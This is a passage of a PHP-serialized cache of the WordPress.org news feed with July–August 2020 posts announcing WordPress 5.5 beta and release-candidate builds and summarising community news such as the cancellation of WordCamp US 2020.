Spurlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2503:\"\n<p>The second release candidate for WordPress 5.5 is here!</p>\n\n\n\n<p>WordPress 5.5 is slated for release&nbsp;on&nbsp;<strong>August 11, 2020</strong>, but we need&nbsp;<em>your</em>&nbsp;help to get there—if you haven’t tried 5.5 yet,&nbsp;now is the time!</p>\n\n\n\n<p>You can test the WordPress 5.5 release candidate in two ways:</p>\n\n\n\n<ul><li>Try the&nbsp;<a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a>&nbsp;plugin (choose the “bleeding edge nightlies” option)</li><li>Or&nbsp;<a href=\"https://wordpress.org/wordpress-5.5-RC2.zip\">download the release candidate here (zip)</a>.</li></ul>\n\n\n\n<p>Thank you to all of the contributors who tested the&nbsp;Beta releases and gave feedback. Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress.</p>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.5 and update the&nbsp;<em>Tested up to</em>&nbsp;version in the readme file to 5.5. If you find compatibility problems, please be sure to post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>,&nbsp;so those can be figured out before the final release.</p>\n\n\n\n<p>For a more detailed breakdown of the changes included in WordPress 5.5, check out the <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-1/\">WordPress 5.5 beta 1 post</a>. The&nbsp;<a href=\"https://make.wordpress.org/core/2020/07/30/wordpress-5-5-field-guide/\">WordPress 5.5 Field Guide</a>&nbsp;is also out! It’s your source for details on all the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English?&nbsp;<a href=\"https://translate.wordpress.org/projects/wp/dev\">Help us translate WordPress into more than 100 languages!</a>&nbsp;This release also marks the&nbsp;<a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a>&nbsp;point of the 5.5 release schedule.</p>\n\n\n\n<p><em><strong>If you think you’ve found a bug</strong>, you can post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a>&nbsp;in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report,&nbsp;<a href=\"https://make.wordpress.org/core/reports/\">fill one on WordPress Trac</a>, where you can also find&nbsp;<a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8764\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:57:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"The Month in WordPress: July 2020\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2020/08/the-month-in-wordpress-july-2020/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Aug 2020 13:54:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8755\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:340:\"July was an action-packed month for the WordPress project. The month saw a lot of updates on one of the most anticipated releases &#8211; WordPress 5.5! WordCamp US 2020 was canceled and the WordPress community team started experimenting with different formats for engaging online events, in July. Read on to catch up with all the [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Hari Shanker R\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:11539:\"\n<p>July was an action-packed month for the WordPress project. The month saw a lot of updates on one of the most anticipated releases &#8211; WordPress 5.5! WordCamp US 2020 was canceled and the WordPress community team started experimenting with different formats for engaging online events, in July. Read on to catch up with all the updates from the WordPress world.</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>WordPress 5.5 Updates</h2>\n\n\n\n<p>July was full of WordPress 5.5 updates! The WordPress 5.5 <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-1\">Beta 1</a> came out on July 7, followed by <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-2/\">Beta 2</a> on July 14, <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-3/\">Beta 3</a> on July 21, and <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-4/\">Beta 4</a> on July 27. Subsequently, the team also published the first <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-release-candidate/\">release candidate</a> of WordPress 5.5 on July 28.&nbsp;</p>\n\n\n\n<p>WordPress 5.5, which is slated for release on <a href=\"https://make.wordpress.org/core/5-5/\">August 11, 2020</a>, is a major update with features like <a href=\"https://make.wordpress.org/core/tag/feature-autoupdates/\">automatic updates for plugins and themes</a>, a <a href=\"https://make.wordpress.org/plugins/2020/07/22/proposed-block-directory-guidelines/\">block directory</a>, <a href=\"https://make.wordpress.org/core/2020/06/10/merge-announcement-extensible-core-sitemaps/\">XML sitemaps</a>, <a href=\"https://make.wordpress.org/core/2020/07/16/block-patterns-in-wordpress-5-5/\">block patterns</a>, and <a href=\"https://make.wordpress.org/core/2020/07/14/lazy-loading-images-in-5-5/\">lazy-loading images</a>, among others. To learn more about the release, check out its <a href=\"https://make.wordpress.org/core/2020/07/30/wordpress-5-5-field-guide/\">field guide post</a>.</p>\n\n\n\n<p>Want to get involved in building WordPress Core? Follow<a href=\"https://make.wordpress.org/core/\"> the Core team blog</a>, and join the #core channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Gutenberg 8.5 and 8.6</h2>\n\n\n\n<p>The core team launched Gutenberg <a href=\"https://make.wordpress.org/core/2020/07/08/whats-new-in-gutenberg-8-july/\">8.5</a> and <a href=\"https://make.wordpress.org/core/2020/07/22/whats-new-in-gutenberg-july-22/\">8.6</a>. Version 8.5 &#8211; the last plugin release will be included entirely (without experimental features) in WordPress 5.5, introduced improvements to block drag-and-drop and accessibility, easier updates for external images, and support for the block directory. Version 8.6 comes with features like Cover block video position controls and block pattern updates. For full details on the latest versions on these Gutenberg releases, visit these posts about <a href=\"https://make.wordpress.org/core/2020/07/08/whats-new-in-gutenberg-8-july/\">8.5</a> and <a href=\"https://make.wordpress.org/core/2020/07/22/whats-new-in-gutenberg-july-22/\">8.6</a>.</p>\n\n\n\n<p>Want to get involved in building Gutenberg? Follow <a href=\"https://make.wordpress.org/core/\">the Core team blog</a>, contribute to <a href=\"https://github.com/WordPress/gutenberg/\">Gutenberg on GitHub</a>, and join the #core-editor channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>.</p>\n\n\n\n<h2>Reimagining Online WordPress Events</h2>\n\n\n\n<p>The Community team made the difficult decision <a href=\"https://make.wordpress.org/community/2020/07/27/in-person-events-in-rest-of-year-2020/\">to suspend in-person WordPress events for the rest of 2020</a> in light of the COVID-19 pandemic. The team has also started working on <a href=\"https://make.wordpress.org/community/2020/07/13/reimagining-online-events/\">reimagining online events</a>. Based on <a href=\"https://make.wordpress.org/community/2020/07/13/reimagining-online-events/#comment-28505\">feedback from the community members</a>, the team decided to <a href=\"https://make.wordpress.org/community/2020/07/23/moving-forward-with-online-events/\">make changes to the current online WordCamp format</a>. Key changes include wrapping up financial support for A/V vendors, ending event swag support for newer online WordCamps, and suspending the Global Community Sponsorship program for 2020. The team encourages upcoming online WordCamps to experiment with their events to facilitate an effective learning experience for attendees while avoiding online event fatigue. The team is currently working on a proposal to organize community-supported <a href=\"https://make.wordpress.org/community/2020/07/23/building-community-beyond-events/\">recorded workshops and synchronous discussion groups</a> to help community members learn WordPress.<br><br>Want to get involved with the Community team? <a href=\"https://make.wordpress.org/community/\">Follow the Community blog here</a>, or join them in the #community-events channel in <a href=\"https://make.wordpress.org/chat/\">the Making WordPress Slack group</a>. To organize a Meetup or WordCamp, <a href=\"https://make.wordpress.org/community/handbook/virtual-events/welcome/applying-for-a-virtual-event/\">visit the handbook page</a>.&nbsp;</p>\n\n\n\n<h2>WordCamp US 2020 is canceled</h2>\n\n\n\n<p>The organizers of WordCamp US 2020 have <a href=\"https://2020.us.wordcamp.org/2020/07/30/wcus-2020-an-update/\">canceled the event</a> in light of the continued pandemic and online event fatigue. The flagship event, which was originally scheduled for October 27-29 as an in-person event, had already planned to transition to an online event. Several WCUS Organizers will be working with the WordPress Community team to focus on other formats and ideas for online events, including a 24-hour contributor day, and contributing to the workshops initiative <a href=\"https://make.wordpress.org/community/2020/07/23/building-community-beyond-events/\">currently being discussed</a>. Matt Mullenweg’s State of the Word (which typically accompanies WordCamp US) is likely to take place in a different format later in 2020.</p>\n\n\n\n<h2>Plugin and theme updates are now available over zip files</h2>\n\n\n\n<p>After eleven years, WordPress now allows users to update plugins and themes by <a href=\"https://core.trac.wordpress.org/changeset/48390\">uploading a ZIP file, in WordPress 5.5</a>.&nbsp; The feature, which was merged on July 7, has been one of the most requested features in WordPress. Now, when a user tries to upload a plugin or theme zip file from the WordPress dashboard by clicking the “Install Now” button, WordPress will direct users to a new screen that compares the currently-installed extension with the uploaded versions. Users can then choose between continuing with the installation or canceling. WordPress 5.5 will also offer <a href=\"https://make.wordpress.org/core/tag/feature-autoupdates/\">automatic plugin and theme updates</a>.&nbsp;</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Further Reading:</h2>\n\n\n\n<ul><li>The <a href=\"https://make.wordpress.org/plugins/2020/07/22/proposed-block-directory-guidelines/\">Block directory</a> is coming to WordPress with the 5.5 release. Plugin authors can now <a href=\"https://make.wordpress.org/plugins/2020/07/11/you-can-now-add-your-own-plugins-to-the-block-directory/\">submit their Block plugins to the directory</a>.</li><li>The Core team has opened up the <a href=\"https://make.wordpress.org/core/2020/07/31/wordpress-5-6-whats-on-your-wishlist/\">call for features</a> in the WordPress 5.6 release. You can <a href=\"https://make.wordpress.org/core/2020/07/31/wordpress-5-6-whats-on-your-wishlist/\">comment on the post</a> with features that you’d like to be included, current UX pain points, or maintenance tickets that need to be addressed. August 20 is the deadline for feature requests. </li><li>Editor features such as the new Navigation block, the navigation screen, and the widget screen that were originally <a href=\"https://make.wordpress.org/updates/2020/03/06/update-progress-on-goals/\">planned to be merged with WordPress 5.5</a> have been <a href=\"https://make.wordpress.org/core/2020/07/02/editor-features-for-wordpress-5-5-update/\">pushed for the next release</a>. </li><li>The Theme team is inviting proposals on whether to allow themes to <a href=\"https://make.wordpress.org/themes/2020/07/13/proposal-allow-themes-to-add-a-top-level-admin-menu/\">place an additional top-level menu link</a> in the admin.</li><li><a href=\"https://buddypress.org/2020/07/buddypress-6-2-0-beta/\">BuddyPress 6.2 beta </a>is out in the wild, and the team will soon release the stable version. The update includes changes that will make BuddyPress fully compatible with WordPress 5.5.</li><li>WordCamp EU 2021, which was being planned as an in-person event in Porto, Portugal, <a href=\"https://europe.wordcamp.org/2021/wordcamp-europe-2021-will-be-online/\">is moving online</a>. The team is considering an in-person WordCamp EU in 2022. </li><li>The Polyglots team has prepared and finalized a <a href=\"https://make.wordpress.org/polyglots/2020/07/09/translation-editor-locale-manager-vetting-criteria-page-draft/\">Translation Editor &amp; Locale Manager Vetting Criteria</a> to provide more clarity on how global mentors assign PTE/GTE/Locale Managers and to help locale teams set their own guidelines. The document, which was finalized <a href=\"https://make.wordpress.org/polyglots/2020/07/09/translation-editor-locale-manager-vetting-criteria-page-draft/\">after a lot of discussion</a>, is now available in the <a href=\"https://make.wordpress.org/polyglots/handbook/translating/expectations/translation-editor-locale-manager-vetting-criteria/\">Polyglots handbook</a>.</li><li>Members of the Community team <a href=\"https://make.wordpress.org/community/2020/07/03/proposal-recognition-for-event-volunteers-and-attendees-in-wordpress-org-profile/\">are discussing</a> whether WordCamp volunteers, WordCamp attendees, or Meetup attendees should be awarded a WordPress.org profile badge. The ongoing discussion will be open for comments until August 13.</li><li>The <a href=\"https://make.wordpress.org/core/tag/feature-notifications/\">WP Notify project</a>, which aims to create a better way to manage and deliver notifications to the relevant audience, is on to its next steps. The team has finalized the initial requirements, and is <a href=\"https://make.wordpress.org/core/2020/07/09/wp-notify-next-steps/\">kicking off the project build</a>.</li><li>The WordPress documentation team is <a rel=\"noreferrer noopener\" href=\"https://make.wordpress.org/docs/tag/external-linking-policy/\" target=\"_blank\">considering a ban on links to commercial websites</a> in a revision to its external linking policy. The policy change does not remove external links to commercial sites from WordPress.org and only applies to documentation sites. The idea is to protect documentation from being abused, and to prevent the WordPress project from being biased. Discussion on this post is still ongoing, and a decision has not yet been made. Feel free to<a href=\"https://make.wordpress.org/docs/tag/external-linking-policy/\"> comment on the discussion posts</a>, if you would like to share your thoughts on the topic. </li></ul>\n\n\n\n<p><em>Have a story that we should include in the next “Month in WordPress” post? Please </em><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><em>submit it here</em></a><em>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8755\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 5.5 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2020/07/wordpress-5-5-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Jul 2020 19:08:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8732\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:370:\"The first release candidate for WordPress 5.5 is now available! This is an important milestone in the community&#8217;s progress toward the final release of WordPress 5.5. “Release Candidate” means that the new version is ready for release, but with millions of users and thousands of plugins and themes, it’s possible something was missed. WordPress 5.5 [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Jb Audras\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2970:\"\n<p>The first release candidate for WordPress 5.5 is now available!</p>\n\n\n\n<p>This is an important milestone in the community&#8217;s progress toward the final release of WordPress 5.5. </p>\n\n\n\n<p>“Release Candidate” means that the new version is ready for release, but with millions of users and thousands of plugins and themes, it’s possible something was missed. WordPress 5.5 is slated for release&nbsp;on&nbsp;<strong>August 11, 2020</strong>, but we need&nbsp;<em>your</em>&nbsp;help to get there—if you haven’t tried 5.5 yet,&nbsp;<strong>now is the time</strong>!</p>\n\n\n\n<p>You can test the WordPress 5.5 release candidate in two ways:</p>\n\n\n\n<ul><li>Try the&nbsp;<a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a>&nbsp;plugin (choose the “bleeding edge nightlies” option)</li><li>Or&nbsp;<a href=\"https://wordpress.org/wordpress-5.5-RC1.zip\">download the release candidate here (zip)</a>.</li></ul>\n\n\n\n<p>Thank you to all of the contributors who tested the&nbsp;Beta releases and gave feedback. Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress.</p>\n\n\n\n<h2>What’s in WordPress 5.5?</h2>\n\n\n\n<p>WordPress 5.5 has lots of refinements to polish the developer experience. To keep up, subscribe to the&nbsp;<a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a>&nbsp;and pay special attention to the&nbsp;<a href=\"https://make.wordpress.org/core/tag/5-5+dev-notes/\">developer notes</a>&nbsp;tag for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2>Plugin and Theme Developers</h2>\n\n\n\n<p>Please test your plugins and themes against WordPress 5.5 and update the&nbsp;<em>Tested up to</em>&nbsp;version in the readme file to 5.5. If you find compatibility problems, please be sure to post to the&nbsp;<a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>,&nbsp;so those can be figured out before the final release.</p>\n\n\n\n<p>The&nbsp;WordPress 5.5 Field Guide, due very shortly, will give you a more detailed dive into the major changes.</p>\n\n\n\n<h2>How to Help</h2>\n\n\n\n<p>Do you speak a language other than English?&nbsp;<a href=\"https://translate.wordpress.org/projects/wp/dev\">Help us translate WordPress into more than 100 languages!</a>&nbsp;This release also marks the <a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a>&nbsp;point of the 5.5 release schedule.</p>\n\n\n\n<p><em><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href=\"https://make.wordpress.org/core/reports/\">fill one on WordPress Trac</a>, where you can also find <a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8732\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 5.5 Beta 4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Jul 2020 20:56:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8719\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:313:\"WordPress 5.5 Beta 4 is now available! This software is still in development, so it’s not recommended to run this version on a production site. Consider setting up a test site to play with the new version. You can test WordPress 5.5 Beta 4 in two ways: Try the WordPress Beta Tester plugin (choose the [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Baumwald\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3812:\"\n<p>WordPress 5.5 Beta 4 is now available!</p>\n\n\n\n<p id=\"block-81bd56b9-ea44-43ad-ab36-a5ae78b54375\"><strong>This software is still in development,</strong> so it’s not recommended to run this version on a production site. Consider setting up a test site to play with the new version.</p>\n\n\n\n<p id=\"block-7cc1bbc6-17f9-44c5-8f67-da4e3059ad69\">You can test WordPress 5.5 Beta 4 in two ways:</p>\n\n\n\n<ul id=\"block-4840af57-f44b-4d9f-aa64-c6a452392e42\"><li>Try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (choose the “bleeding edge nightlies” option)</li><li>Or <a href=\"https://wordpress.org/wordpress-5.5-beta4.zip\">download the beta here</a> (zip).</li></ul>\n\n\n\n<p id=\"block-a40528cb-eb3b-4c8a-8f5e-aa700f1ba086\">WordPress 5.5 is slated for release on <a href=\"https://make.wordpress.org/core/5-5/\">August 11th, 2020</a>, and <strong>we need your help to get there</strong>!</p>\n\n\n\n<p>Thank you to all of the contributors who tested the <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-3/\">beta 3</a> development release and gave feedback. Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress. </p>\n\n\n\n<h2 id=\"block-15d6d57f-905d-4a47-9f66-839468a5375a\">Some highlights</h2>\n\n\n\n<p id=\"block-85da84ec-c841-42f9-8d3b-1a4537a61d10\">Since <a href=\"https://wordpress.org/news/2020/02/wordpress-5-4-beta-3/\">beta 3</a>, <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;changetime=07%2F22%2F2020..07%2F28%2F2020&amp;milestone=5.5&amp;group=component&amp;col=id&amp;col=summary&amp;col=owner&amp;col=type&amp;col=priority&amp;col=component&amp;col=version&amp;order=priority\">43 bugs</a> have been fixed. Here are a few changes in beta 4:</p>\n\n\n\n<ul><li>Add <code>\"loading\"</code> as an allowed kses image attribute (see <a href=\"https://core.trac.wordpress.org/ticket/50731\">#50731</a>).</li><li>Add filter for the plugin/theme auto-update message in the Info tab of Site health (see <a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://core.trac.wordpress.org/ticket/50663\">#50663</a>).</li><li><code>$_SERVER[\'SERVER_NAME\']</code> not a reliable when generating email host names (see <a href=\"https://core.trac.wordpress.org/ticket/25239\">#25239</a>)</li><li>Several backported fixes from Gutenberg are included in WordPress 5.5 Beta 4 (<a href=\"https://github.com/WordPress/gutenberg/pull/24218\">See PR #24218</a>)</li></ul>\n\n\n\n<h2 id=\"block-76156b2b-0a52-4502-b585-6cbe9481f55b\">Developer notes</h2>\n\n\n\n<p id=\"block-3fe5e264-0a95-4f12-9a18-0cb9dc5955d1\">WordPress 5.5 has lots of refinements to polish the developer experience. To keep up, subscribe to the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> and pay special attention to the <a href=\"https://make.wordpress.org/core/tag/5-5+dev-notes/\">developers’ notes</a> for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2 id=\"block-bc89fd56-47b0-439f-8e2c-4a642c80a616\">How to Help</h2>\n\n\n\n<p id=\"block-3ff83a77-8b54-4061-ae2d-45fc984cbd76\">Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev/\">Help translate WordPress into more than 100 languages</a>!</p>\n\n\n\n<p id=\"block-9d871099-ec49-446c-8322-9e49b7498c10\">If you think you’ve found a bug, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. We’d love to hear from you!</p>\n\n\n\n<p id=\"block-bd71c1d3-39d9-4b2a-8193-3486497b45fd\">If you’re comfortable writing a reproducible bug report, <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>, where you can also find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8719\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			